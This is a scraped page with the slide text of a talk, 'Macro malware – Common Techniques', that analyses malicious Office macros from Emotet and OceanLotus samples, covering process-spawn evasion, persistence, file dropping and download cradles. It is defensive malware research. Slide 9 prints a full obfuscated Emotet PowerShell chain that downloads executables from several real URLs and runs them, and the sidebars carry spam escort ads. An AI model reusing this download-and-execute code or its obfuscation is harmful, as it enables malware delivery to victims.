Sbc 2020 bao gio vn co anm dua vao cong nghe moSbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSecurity Bootcamp
 
Giam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrGiam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrSecurity Bootcamp
 
Insider threat-what-us-do d-want
Insider threat-what-us-do d-wantInsider threat-what-us-do d-want
Insider threat-what-us-do d-wantSecurity Bootcamp
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learningSecurity Bootcamp
 
Tim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuTim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuSecurity Bootcamp
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 costSecurity Bootcamp
 
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectoryGOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectorySecurity Bootcamp
 
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018Security Bootcamp
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksSecurity Bootcamp
 
Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Security Bootcamp
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaSecurity Bootcamp
 

Plus de Security Bootcamp (20)

Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdf
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurity
 
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewNguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
 
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
 
Deception change-the-game
Deception change-the-gameDeception change-the-game
Deception change-the-game
 
Giam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrGiam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdr
 
Sbc2019 luong-cyber startup
Sbc2019 luong-cyber startupSbc2019 luong-cyber startup
Sbc2019 luong-cyber startup
 
Insider threat-what-us-do d-want
Insider threat-what-us-do d-wantInsider threat-what-us-do d-want
Insider threat-what-us-do d-want
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learning
 
Tim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuTim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cu
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 cost
 
Build SOC
Build SOC Build SOC
Build SOC
 
AD red vs blue
AD red vs blueAD red vs blue
AD red vs blue
 
Securitybox
SecurityboxSecuritybox
Securitybox
 
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectoryGOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
 
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
 
Api security-present
Api security-presentApi security-present
Api security-present
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber Attacks
 
Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ Vikjava
 

Dernier

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 

Dernier (20)

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Macro malware common techniques - public

  • 1. Macro malware – Common Techniques <m4n0w4r> 9/16/2019 Macro malware - common techniques 1
  • 2. #Wh0_4m_1? 1. @kienmanowar/@m4n0w4r 2. Twitter: @kienbigmummy 3. Company: 4. Blog: kienmanowar.wordpress.com 5. Writer for tradahacking.vn 9/16/2019 Macro malware - common techniques 2
  • 3. Agenda • Typical Method • Evading Parent/Child Analysis • Scheduled Task Creation • Registry Modification • Dropping Files • Download File 9/16/2019 Macro malware - common techniques 3
  • 4. Cyber Kill Chain Model by Lockheed Martin (Intelligence-Driven Computer Network Defense) 9/16/2019 Macro malware - common techniques 4
  • 5. The Typical Method 9/16/2019 Macro malware - common techniques 5
  • 6. Emotet variant 9/16/2019 Macro malware - common techniques 6 https://www.virustotal.com/gui/file/fdd6288747eb976a863966935b7800b1ed839ded3fe15dfa039a2c6f68b940b
  • 7. VBA code 9/16/2019 Macro malware - common techniques 7
  • 8. Code from VBA Modules VBA.Shell$ iphSIiNfaNjTt, 0 Function iphSIiNfaNjTt() iphSIiNfaNjTt = aPNnoXoRGKMH + TiaBlsUalNnM + Chr(34) + PDmnv + RswVlbiC + vColwfOi + OzfjstduXoj + zBYLwoLni + pnThlsfRP + Gfccqau + LQjdFQhEO + JstYsN + sDwChEYslpP + zDTGrVwpTAR + mitjmD + ciSOwmuuE + WEPLobW + vqfEdabPIV + vJOMi + UXiBTISI + dfhFU + nwoRcLWNZSV + NCMSjazF + RjwDOIFiGzs + ohQcC + RlVzAwiHW + RifikIkmi + FCRNXlL Function aPNnoXoRGKMH() aPNnoXoRGKMH = zilMH + pcrOzYMPXCi + WbDnCzlCK + pDUqAABFGh + lUoibmOjr + KhVOwsl + HDQPmHVYiD + GzWjGEcXiX + ZwlCz + dCjRnjGNz + nlUHZPnE + HEaiojkVdDO + XFjnjbjmqJl + kqjwHUq + piantJ + rbEDwpNc + QzYmE + nrJILEn + ELizU + MqfiQmS + LOokRDhqqN + IalQpFoPE + WarbPVl + MMjcSjVm + iruMBLDcwO + RmkFihGQtT + ArUkXJj + OBwrdhtvBW + LVzEDLjRQ + DjYuFmCTTb + pTfFmQL + cqWwPkKsqz + bICZzvUpr + CrQFN + hDTBAKT + OBMNt + mMIiPM + VVwsdSc + cQYjuhzP + YrjGfpqCsh + LcobGJwo + sTYPbGYDlY + niSmUt + CGnOlwKbSU + cwnETzznnOA + XuaUi Sub AutoOpen() Function TiaBlsUalNnM() TiaBlsUalNnM = TjwZuOEuD + pNnCVwPqc + nJjPqlMU + bUkkvzm + BwpYcYDBvwJ + rwUqquf + HzXlmSLam + QWFwhK + uWzPz + zBMjmZtjcta + mUCjUokNWi + CIEnrYmn + cNibOLwTH + pBaLfCn + EJOFwt + XBTEJrDCU + OCcJVHjp + ZnaGFFBj + tXLGhr + vwOZE + mVOJSknpq + lcObnwwZdL + ANZAwiDb + fbiaJQGX + qPAaHtT + fEfOho + tAIPPEJcL + zmaMGDoLTX + zDHkzGhR + DrWNQJz + uPzAhno + LGziXMAdoL + WVZkI + VipSi + IAjpSiYwj + hnTWVhb + ZOrnliBU 9/16/2019 Macro malware - common techniques 8
  • 9. Decoded VBA call to obfuscated powershell cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set %jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set %DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%! "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd =k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect randok9B+k9Bm;ki4T+'+'i4T9i'+'4T+i4TB+k9BrONbk9B+k9Bck'+'9B+k9Bd = Hk9B+k9B1Ihtk9B+k9Btp:k9B+k9B//cok9B+k9i4T+i4TBffeybarn.com/Qq3sk9i4T+i4TB+k9BDS0/,ki4T+i4T9B+k9Bhttpi4T+i4T://e asyfook9B+k9Bd.us/'+'Gk9B+k9B4Vk9B+k9BaoW/k9B'+'+k9B,https://icbk9B+'+'k9Bb.uk9B+k9Bnuk9B+k9Bdk9B+k9B.ac.ik9B+k9 Bdk9B+k9i4T+i4TB'+'/k9B+k9B0XSX0/'+'k9B+k9B,k9B+k9Bhttpki'+'4T+i4T9B+k9B://'+'fk9B+k9Bi4T+i4Testival-dk9B+i 4T+i4Tk9Bruk9B+k9'+'Bzba.'+'ck9B+k9Bom.ua'+'/k9B+k9i4T+i4TBr4Ik9B+k9Bwzk9B+k'+'9B/,http:/k9B+k9B/k9B+ki4T+i4T9Bp lak9B+k9Bn.gotk9B+k9Beborg2021k9B+k9Bi4T+i4T.wek9B'+'+k9Bbadmini4T+i4T8.nek9i4T+i4TB+k9'+'Bt/wpk9B+k9B- i4T+i4Tcok9B+k9Bntent/t'+'hek9B+k9Bmk9B+k9Bek9B+k9Bs/k9B+k9Bgotebk9B'+'+k9Borg/fhYk9B+k9Bmi4T+i4T/H1i4T+i4TI.Spk 9B+k'+'9Bli4T+i4'+'Tit'+'(H1I,H1'+'I);rOk9B+k9B'+'Nkarapas = '+'rk9B+k9BONnsadasd'+'i4T+i4'+'Tk9'+'B+k9B.nk9B+k9Bek9B+k9Bxk9B+k9Btk9B+k9i4T+i4TB'+'(k9B+k9B1, k9B+k9B3k9B+k9B4k9B+k9B3ki4T+i4T9B'+'+k9B24k9B+k9Bi4T+i4T5);rONk9B+k9Bhuas =ki4T+i'+'4T9B+k9B rONenv:puk9B+k9Bblik9B+k9Bi4T+i4Tc + H1k9B'+'+k9B'+'IN5oH1I +k9B+k9B rk9B+k9BOk9B+k9BNkarapi4T+i4Tas + H1I.exeH1k9B+k9BI;forek9B+k9'+'Bach(rOk9B+k9BNab'+'c ii4T+i4Tnk9B+k'+'9B rk9B+k9BONbcd){k9B+k9Btrk9B+k9By{rON'+'f'+'ri4T+i4Tanc.Downloai4T+i4TdFi4T+i4Tile(rk9B+k9BO'+'Nk9B+k9B'+'ai4T+i4 Tbck9'+'B+k'+'9B.Tki4T'+'+i4T9B+k9Bok9i4T+i4TB+k9BString(),i4T+i4T rONhk9B+k9Buki4T+i4T9B+k9Bas);k9B+k9BInvoke- k9B+k9BItem(k9B+k9Br'+'ONhuas)k9B+k9B;k9i4T+i 4TB+k9Bbreak9B+k9Bk;}catch{i4T+i4'+'Twritk9B+k9Bek9B+k9B'+'-k9B+k9Bh'+'k9B+k9Bost rON'+'_.k9B+k9BEk9B+k9Bxcept'+'ion.i4T+i4TMek9B+k9Bssage;}}k9B).rEPlACE(k9BrONk9B,k9BrcWk9B).rEP'+'lACE(([chAR]7 8+[chAR]53+[chAR]111),[Si4T+i4TtrING][chAR]92).rEPlACE(([chi4T+i4TAR]72+[ch'+'AR]49+[chAR]73),[StrING][chAR]39'+ ')GLo& ('+' rcWENv:p'+'uBi4T+i4TLi4T+i4TIC[13]+rcWENv:PuBLIc[5]+k9BXk9B)i4T) - cReplaCe([Char]71+[Char]76+[Char]111'+'),[Char]124 -rEPLaCE([Char]114+[Cha'+'r]99+[Char]87),[Char]36 - cReplaCei4Tk9Bi'+'4T,[Char]39) JYX &( ([STriNg]EzevERboSeprEFErEnCE)[1,3]+i4TXi4T-JoIni4Ti4T)') -rEPlaCe ([ChAr]69+[ChAr]122+[ChAr]101),[ChAr]36 -CrePLace([ChAr]105+[ChAr]52+[ChAr]84),[ChAr]39 -rEPlaCe 'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X') 9/16/2019 Macro malware - common techniques 9
  • 10. 9/16/2019 Macro malware - common techniques 10
  • 11. Decoded powershell 9/16/2019 Macro malware - common techniques 11
  • 12. Evading Parent/Child Analysis 9/16/2019 Macro malware - common techniques 12
  • 13. • This behavior is relatively anomalous and can easily be detected by most modern blue-teams. 9/16/2019 Macro malware - common techniques 13
  • 14. Spawning via WmiPrvse.exe using wmi https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes • New process will be spawned under “wmiprvse.exe” instead of the Office process. The code to perform this is below: 9/16/2019 Macro malware - common techniques 14
  • 15. Spawning via ShellCOM • https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ • https://github.com/tyranid/oleviewdotnet (James Forshaw) 9/16/2019 Macro malware - common techniques 15
  • 16. Spawning via ShellCOM • Sample code using ShellBrowserWindow : https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html 9/16/2019 Macro malware - common techniques 16
  • 17. Spawning via ShellCOM • Sample code using ShellWindows : 9/16/2019 Macro malware - common techniques 17
  • 18. Parent PID Spoofing with CreateProcessA • The API call CreateProcessA supports a parameter called “lpStartupInfo” where you can essentially define the parent process you want to use. – lpStartupInfo parameter points to a STARTUPINFOEX structure 9/16/2019 Macro malware - common techniques 18
  • 19. Sample in the wild https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/ 9/16/2019 Macro malware - common techniques 19
  • 20. 1st stage VBA Code 9/16/2019 Macro malware - common techniques 20
  • 21. Decoded base64 String 9/16/2019 Macro malware - common techniques 21
  • 22. 2nd VBA code (1) 9/16/2019 Macro malware - common techniques 22
  • 23. dllhost.exe run as child of explorer.exe 9/16/2019 Macro malware - common techniques 23
  • 24. 2nd VBA code (2) 9/16/2019 Macro malware - common techniques 24
  • 25. Scheduled Task Creation 9/16/2019 Macro malware - common techniques 25
  • 26. • VBScript supports us create Scheduled Tasks, which can be abused to not only related to activity from Office (svchost.exe will spawn the task). – Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger- example--scripting- 9/16/2019 Macro malware - common techniques 26
  • 27. Sample in the wild https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 9/16/2019 Macro malware - common techniques 27
  • 28. Extract out the VBA Macro code 9/16/2019 Macro malware - common techniques 28
  • 29. Sub Document_Open() 9/16/2019 Macro malware - common techniques 29
  • 30. Sub Document_Close() 9/16/2019 Macro malware - common techniques 30
  • 31. A sample of APT32 (aka OceanLotus) https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876 9/16/2019 Macro malware - common techniques 31
  • 32. 9/16/2019 Macro malware - common techniques 32
  • 33. 9/16/2019 Macro malware - common techniques 33
  • 34. 9/16/2019 Macro malware - common techniques 34
  • 35. 9/16/2019 Macro malware - common techniques 35
  • 36. Registry Modification 9/16/2019 Macro malware - common techniques 36
  • 37. • VBScript also allows access to the registry - allowing the storing of payloads, modification of settings, and creation of persistence entries directly from a macro (using WMI or WScript) – Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks-- registry 9/16/2019 Macro malware - common techniques 37
  • 38. Wild wild west https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e0249/16/2019 Macro malware - common techniques 38 https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
  • 39. Extract out the VBA Macro code 9/16/2019 Macro malware - common techniques 39
  • 40. 9/16/2019 Macro malware - common techniques 40
  • 41. Write 1st decoded base64 to "C:ProgramDataWindowsDefender.ini" 9/16/2019 Macro malware - common techniques 45
  • 42. Write 2nd decoded base64 to "C:ProgramDataDefender.sct" 9/16/2019 Macro malware - common techniques 46
  • 43. Write 3rd decoded base64 to "C:ProgramDataDefenderService.inf" 9/16/2019 Macro malware - common techniques 47
  • 44. LoL_Bin (Living Off The Land) 9/16/2019 Macro malware - common techniques 48
  • 45. 9/16/2019 Macro malware - common techniques 49
  • 46. Another #OceanLotus sample 9/16/2019 Macro malware - common techniques 50 https://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007
  • 47. VBA code 9/16/2019 Macro malware - common techniques 51
  • 48. Dropping Files 9/16/2019 Macro malware - common techniques 52
  • 49. • Dropping files has its pros and cons. Making changes to disk can often mean payloads are analyzed by antivirus and leave forensic artefacts. Yet in most breaches attackers still use payloads dropped to disk due to the convenience and ease of having a solid foothold in a network. • In VBScript we can make use of the FileSystemObject to drop files. 9/16/2019 Macro malware - common techniques 53
  • 50. Again another sample of #OceanLotus…. 9/16/2019 Macro malware - common techniques 54 https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
  • 51. VBA code… 9/16/2019 Macro malware - common techniques 55
  • 52. Dropping dll file 9/16/2019 Macro malware - common techniques 56
  • 53. Another sample https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7 9/16/2019 Macro malware - common techniques 57 https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
  • 54. VBA Code – Get Base64 data 9/16/2019 Macro malware - common techniques 58
  • 55. VBA Code – Decode b64 and execute payload 9/16/2019 Macro malware - common techniques 59
  • 56. Download file 9/16/2019 Macro malware - common techniques 60
  • 57. • There are multiple ways VBScript can be used to download content. This content can then be dropped to disk, inserted into the registry or injected into memory. • One of the most common and simplest methods is using the XMLHTTP library along with ADODB to output to file. • Another option would be to use a direct API call, for example a simple VBScript download cradle can be implemented using URLDownloadToFileA. 9/16/2019 Macro malware - common techniques 61
  • 58. Some sample code 9/16/2019 Macro malware - common techniques 62
  • 60. Extract out VBA code 9/16/2019 Macro malware - common techniques 64
  • 61. Extract out VBA code 9/16/2019 Macro malware - common techniques 65
  • 62. 9/16/2019 Macro malware - common techniques 66
  • 64. VBA Code 9/16/2019 Macro malware - common techniques 68
  • 65. 9/16/2019 Macro malware - common techniques 69
  • 66. End! 9/16/2019 Macro malware - common techniques 70